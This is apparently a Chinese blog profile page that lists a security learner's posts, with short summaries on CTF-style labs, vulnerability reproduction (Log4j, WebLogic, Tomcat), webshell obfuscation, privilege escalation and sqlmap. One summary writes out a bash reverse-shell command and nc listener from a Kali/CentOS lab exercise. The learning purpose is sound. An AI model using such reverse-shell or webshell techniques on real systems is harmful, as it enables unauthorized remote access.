- 博客(41)
- 收藏
- 关注
原创 app脱壳
为了防止代码泄露和篡改,开发者通常会对APP进行加固加壳处理,使其难以直接获取数据。针对加固后的APP,可以采用frida-dexdump和LSP框架进行脱壳操作。
2025-05-15 07:43:58
427
原创 java反序列化&DNSlog链&cc链
Java序列化是将对象转换为二进制字节流的过程,反序列化则是将字节流恢复为对象。序列化常用于数据持久化、网络传输和远程方法调用(RMI)。
2025-05-14 16:04:58
979
原创 java反编译&工具使用
IDEA安装目录下的反编译插件“java-decompiler.jar”所在路径,需要加上双引号。示例:“E:\IntelliJ IDEA 2020.2.2\plugins\java-decompiler\lib\java-decompiler.jar”示例:E:\exercise\reflect。可以对app进行反编译,但是吃内存,其中Ctrl+Shif+F可以进行全局搜索。反编译后的文件输出目录,该目录需自己提前创建好,需要加上双引号。示例:“E:\exercise\reflect\test”
2025-05-14 08:45:24
133
原创 SpringBoot创建&参数可控&过滤器拦截器&Shiro机制
本文详细介绍了如何使用SpringBoot创建项目的基本步骤。首先,通过Maven项目模板新建项目,并选择Spring Web依赖。接着,配置项目的基本结构和文件,包括application.yml配置文件的创建及其与application.properties的优先级比较。文章还展示了如何创建控制器类,并使用@RestController和@RequestMapping注解定义路由和处理请求。
2025-05-14 08:41:03
1568
原创 Filter过滤器配置
在Servlet当中存在一个技术叫做Filter过滤器,这个东西是干什么用的呢,其实这个东西更多的是用来进。在上述代码当中,可以看到实现的接口为Filter接口,并且其中自动创建了三个方法,分别为init初始化方。在日常审计过程当中Servlet当中一般来说我们首先要先去看其中的过滤器监听器以及拦截器,因为在这。三种模式下很可能会对用户传入的参数进行一定的过滤,最终即使我们费尽心思去审计出来漏洞,但是。因为我们设置的为/*方式,所以全部请求都要去走一遍过滤器,还可以这样做。实现其接口规定的方法。
2025-05-14 08:33:41
199
原创 web渗透——信息收集(4)
forks:1000…created:>2019-02-12 test #创建时间大于 2019-02-12 的搜索关键字。user:test in:name test #组合搜索,用户名 test 的标题含有 test 的。pushed:>2019-02-12 test #发布时间大于 2019-02-12 的搜索关键字。用户访问域名 -> CDN节点(WAF) -> 真实服务器ip -> 访问目标主机。forks:>1000 test #forks 数量大于 1000 的搜索关键字。
2025-05-14 08:29:40
598
原创 Servlet基础
Servlet的生命周期包括初始化、处理请求和销毁三个阶段。首先,Servlet通过init()方法进行初始化,该方法仅在Servlet创建时调用一次,用于加载初始化数据。接着,service()方法响应客户端的请求,根据请求类型调用doGet()或doPost()等方法来处理具体逻辑。最后,当Servlet不再被使用或服务器关闭时,调用destroy()方法进行资源清理,Servlet对象随后被垃圾回收。
2025-05-13 22:34:36
840
原创 web渗透——信息收集(2)
小程序开发涉及多个关键文件和目录结构。主体部分由 app.js、app.json 和 app.wxss 组成,分别负责小程序逻辑、公共配置和样式表。
2025-05-13 13:01:48
258
原创 web安全——权限提升
权限提升是网络安全中的一个重要概念,通常指利用系统或应用程序的漏洞,将当前用户的权限提升至更高等级,如管理员或root权限。在Windows和Linux系统中,提权通常通过执行特定的可执行文件(如MS08067.exe或2.6.18.c)来实现。Linux系统中,提权方法包括SUID提权、内核漏洞提权和脏牛提权(CVE-2016-5195)等。SUID提权利用具有SUID属性的文件,以文件所有者的权限执行命令;内核漏洞提权则通过利用操作系统的内核漏洞来获取更高权限;脏牛提权是一种针对Linux内核的漏洞利用
2025-05-12 12:28:51
1049
原创 app进行HOOK基础
本文介绍了如何配置和使用Frida进行Android应用的Hook操作。首先,需要在PC端安装Frida及其工具,确保设备已Root。接着,在Android设备上安装Frida服务端,并确认设备架构后推送对应版本的Frida服务端到设备中。通过ADB命令进行端口转发,并使用Frida列出设备进程。最后,通过编写JavaScript脚本实现Hook操作,监控和调试目标应用的行为。整个过程包括抓包、反编译APK、寻找关键词和执行Hook脚本等步骤。
2025-05-11 09:34:00
337
原创 Servlet项目的创建
本文详细介绍了如何创建和配置一个Java Servlet项目。首先,通过IDE创建一个新的Java Web项目,并配置项目结构。接着,添加Tomcat服务器作为本地服务器,并进行相关设置。如果新建项目时缺少Servlet选项,可以通过手动添加代码模板或选择Java类并指定为Servlet来解决问题。最后,文章展示了如何创建第一个Servlet项目,并解释了Servlet配置文件中<servlet-name>和<url-pattern>的映射关系。通过启动服务器,可以运行并测试Servlet项目。
2025-05-11 09:07:00
152
原创 小程序代理抓包+反编译+动态调试
Proxifier是一款功能强大的网络代理工具,它可以让你将网络应用程序通过代理服务器进行连接。它提供了一个简单而灵活的方式,让你能够将任何应用程序的网络流量路由到指定的代理服务器上,从而实现匿名浏览、绕过网络封锁、访问受限网站等功能。Proxifier 的工作原理是通过修改操作系统的网络设置,将应用程序的网络连接引导到代理服务器上。它支持多种代理协议,包括HTTP、HTTPS、SOCKS v4和SOCKS v5,可以与各种代理服务器兼容。
2025-05-10 12:33:52
823
原创 一句话后门总结
文章摘要:本文介绍了多种编程语言(PHP、ASP、ASPX、JSP)中恶意代码的变种和混淆技术,旨在绕过安全检测。PHP部分通过变量名变形、函数名混淆、Base64编码、回调函数等手段隐藏恶意代码;ASP和ASPX则利用不同的执行方法、字符串拼接、服务器组件等技术实现代码混淆;JSP部分则通过反射、ScriptEngineManager、Base64编码等方式动态执行命令。这些技术展示了攻击者如何通过变形和混淆手段规避安全机制,强调了代码审计和安全防护的重要性。
2025-05-10 10:08:14
808
原创 upload靶场通关笔记
本文介绍了如何搭建和使用upload-labs靶场,并通过几个示例展示了常见的文件上传漏洞及其绕过方法。首先,使用Docker快速搭建upload-labs环境,接着详细解析了move_uploaded_file、unlink、in_array等PHP函数的作用。文章通过多个关卡示例(如前端验证、MIME验证、黑名单绕过、.htaccess和.user.ini利用、大小写绕过等),展示了如何利用不同技术手段绕过文件上传限制,最终成功上传恶意文件并执行。这些示例帮助读者理解文件上传漏洞的常见攻击手法及防御措施
2025-05-10 10:03:23
539
原创 远程shell反弹
本文介绍了在Kali Linux和CentOS之间进行Shell反弹的实验步骤。首先,确保两台设备的IP地址分别为192.168.217.129(Kali)和192.168.217.140(CentOS),并且能够相互通信。实验中关闭了CentOS的防火墙。在Kali上使用nc -lvvp 4444命令监听4444端口,随后在CentOS上执行bash -i >& /dev/tcp/192.168.217.129/4444 0>&1命令,将Shell反弹到Kali。文章详细解释了命令的含义,包括nc的监听模
2025-05-10 09:48:00
623
原创 Windows小知识点
Microsoft Windows操作系统自1985年推出Windows 1.0以来,经历了多次重大更新和版本迭代,逐步确立了其在个人电脑领域的垄断地位。Windows 1.0首次引入了图形用户界面(GUI),允许用户通过鼠标操作,并支持多任务处理。随后的Windows 2.0和Windows 3.0在用户界面和内存管理上进行了显著改进,特别是Windows 3.0的成功为后续版本奠定了基础。1995年发布的Windows 95是第一个不依赖DOS的32位操作系统,引入了全新的图形用户界面和更高效的多任务处
2025-05-10 09:43:13
436
原创 sqlmap的使用
sqlmap 是一款用于检测和利用 SQL 注入漏洞的强大工具。其基础命令包括设置目标 URL、定义请求参数、调整检测级别和风险级别等。用户可以通过指定参数、使用代理或 Tor 网络来增强测试的隐蔽性。进阶命令则提供了更多定制化选项,如从文件中加载目标、设置 HTTP 头部、优化性能等。sqlmap 还支持多种 SQL 注入技术,并能够枚举数据库信息、访问操作系统,甚至获取交互式 shell。通过灵活的配置和丰富的功能,sqlmap 成为渗透测试中不可或缺的工具。
2025-05-10 09:41:06
1047
原创 sqli-labs靶场通关笔记
sqli-labs是一个用于学习和实践SQL注入技术的靶场环境。通过Docker可以快速搭建该环境,具体步骤包括搜索、拉取、运行镜像,并创建容器。在靶场中,用户可以通过不同的关卡(如Less-1、Less-2、Less-3)练习SQL注入技巧。每个关卡涉及不同的注入类型,如基于错误的GET单引号字符型注入、整型注入等。通过判断闭合方式、列数、显位等步骤,用户可以逐步获取数据库信息,如库名、表名、列名和字段内容。这些练习有助于深入理解SQL注入的原理和防御方法。
2025-05-10 08:36:55
883
原创 Jboss漏洞复现
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制。
2025-05-10 07:45:59
582
原创 log4j漏洞复现
Log4j是一个广泛使用的Java日志框架,具有高度灵活性、高效性和可扩展性,适用于调试和监控应用程序。然而,Log4j也暴露了多个安全漏洞,如CVE-2017-5645和CVE-2021-44228。CVE-2017-5645是一个反序列化漏洞,攻击者通过发送恶意payload触发代码执行,影响Log4j 2.8.2之前的2.x版本。CVE-2021-44228是一个远程代码执行(RCE)漏洞,攻击者利用JNDI协议加载远程恶意脚本,影响Log4j 2.0到2.15.0-rc2版本。漏洞复现表明,攻击者可
2025-05-10 07:41:48
775
原创 Weblogic中间件漏洞复现
WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的WebLogicServer 上执行任意代码。
2025-05-09 18:16:31
676
原创 tomcat中间件漏洞复现
而该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者可通过构造特定参数读取webapp目录下的任意文件,如:webapp 配置文件或源代码等。先进行端口扫描发现这几个端口是开放的,8009端口的AJP协议是开启的,Tomcat版本<9.0.31,并且存在8009端口ajp服务的开启。这些权限的究竟有什么作用,详情阅读 Apache Tomcat 8 (8.5.77) - Manager App How-To。manager-script 拥有text接口的权限,和status权限。
2025-05-09 18:07:09
795
原创 正则表达式
字符类:使用方括号 [ ] 来指定字符集。量词:使用 *、+、?、{n}、{n,}、{n,m} 来控制重复次数。分组与捕获:使用圆括号 () 来创建捕获组。断言:使用零宽正向断言 (?= ) 和零宽负向断言 (?!) 来指定条件。锚点:使用 ^ 和 $ 来指定字符串的开头和结尾。转义字符:使用反斜杠 \ 来转义特殊字符。
2025-05-09 17:50:58
370
原创 部分中间件漏洞
漏洞方向(1)以*.asp为命名的文件夹下的任何文章会被解析为.asp格式(2)*.asp;.jpg这种格式的文件,后缀会被;所截断,分号后的被忽略,文件被当做asp执行防御方向:(1)在服务器上限制上传目录的执行权限不让他执行脚本(2)也不允许新建目录防止出现上文说的文件夹名称解析漏洞(3)将上传的文件重命名,什么随机数,时间戳都用上。
2025-05-09 17:50:08
659
原创 漏洞流量特征分析
(1)对sqlmap的判断:若攻击者使用sqlmap且未加 --random-agent参数,则可以通过捕获请求包的user-agent字段来判断攻击者是否在使用sqlmap进行攻击(因为sqlmap使用会将许多payload进行测试,但是UA头不变);sqlmap在进行初识监测时会进行一些预检测,第一条语句是对数据库类型和XSS漏洞进行监测,且这句话几乎每次注入都不变,即我们可以通过XSS测试语句判断。(2)出现一些特殊字符:比如单引号括号’((3)出现SQL命令或语句:增加、删除、修改、查询。
2025-05-09 17:46:26
369
原创 SSH_proxy
这条命令是用来通过SSH建立一个动态端口转发(也称为SOCKS代理)的连接。为了在开机时自动建立这个代理连接,你可以将SSH命令添加到你的启动脚本中。如果你希望避免每次输入SSH密码,可以设置SSH密钥认证。上创建一个SOCKS代理,通过SSH连接到远程主机。如果一切正常,你的SSH连接将不再需要输入密码。: 不执行远程命令,只进行端口转发。: 允许远程主机连接到本地转发端口。: 设置动态端口转发,监听本地地址。: 指定连接到远程主机的端口号为。: 在后台运行SSH客户端。: 调用SSH客户端。
2025-05-09 17:40:11
409
原创 rad -> burpsuite -> x-ray 联动
本文介绍了使用多种工具进行网络安全测试的流程。首先,通过rad工具爬取目标网站数据,并将数据通过Burp Suite进行代理处理。接着,使用x-ray工具对Burp Suite的数据进行扫描,生成HTML格式的测试报告。此外,还介绍了nuclei工具的安装与使用,包括从GitHub下载、解压、安装到本地,并通过命令行进行漏洞扫描。最后,nuclei的扫描结果可以上传至云端进行进一步分析。整个过程涵盖了从数据爬取、代理处理、漏洞扫描到结果上传的完整测试流程。
2025-05-09 17:33:40
118
原创 对于sql注入中使用“--”和“#”注释的区别
在SQL注入中,POST请求通常使用“#”作为注释符,而在GET请求中则使用“--”。这是因为在GET请求中,URL中的“#”会被浏览器视为锚点,导致其后的内容被忽略,从而可能引发请求异常。为了避免这种情况,可以在GET请求中将“#”替换为“%23”或使用“--”作为注释符,以确保注入语句的正确执行。
2025-05-09 17:14:02
89
原创 Docker安装与配置
本文详细介绍了在Ubuntu操作系统上安装Docker并配置DVWA靶场镜像的步骤。首先,通过编辑/etc/apt/sources.list文件配置阿里云镜像源,以加速软件包的安装。接着,更新系统并安装Docker及Docker Compose。随后,通过创建/etc/docker/daemon.json文件并添加多个国内镜像地址,进一步优化Docker的镜像拉取速度。最后,通过Docker拉取并运行DVWA靶场镜像,创建容器并映射端口,成功搭建了DVWA靶场环境。文章还提供了处理DVWA靶场常见问题的方法
2025-05-09 17:12:27
970
原创 Maven基础配置
Maven 是一个项目管理工具,其核心是项目对象模型(POM),用于抽象化项目的开发和管理过程。Maven 通过仓库来存储和共享 JAR 包,使开发者能够方便地访问和使用这些依赖。坐标在 Maven 中用于唯一标识依赖项,确保正确的版本被引入项目。为了提高依赖拉取速度,可以配置镜像仓库,指定从更快的源获取依赖。Maven 的仓库配置和镜像设置是优化项目构建效率的关键步骤。
2025-05-09 16:52:22
181
原创 关于python-5至256地址问题
在Python中,对于-5到256之间的整数,这些常用的数字会在Python解释器启动时就被提前创建并分配好内存空间,这样同样的对象就会引用同一个内存地址,也就具有相同的id。当我们创建这些数值时,Python会为每一个数值分配独立的内存空间,因此,哪怕数值相同也会有不同的id。如果你立即因为相同的值分配了两个变量,无论值是多少,Python解释器可能会为了有效的内存使用和性能优化将它们放在同一个地方。但是有趣的事情又发生了,大家如果在pycharm编译器上运行这两段代码的时候会发现都是true。
2023-10-25 19:43:04
324
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人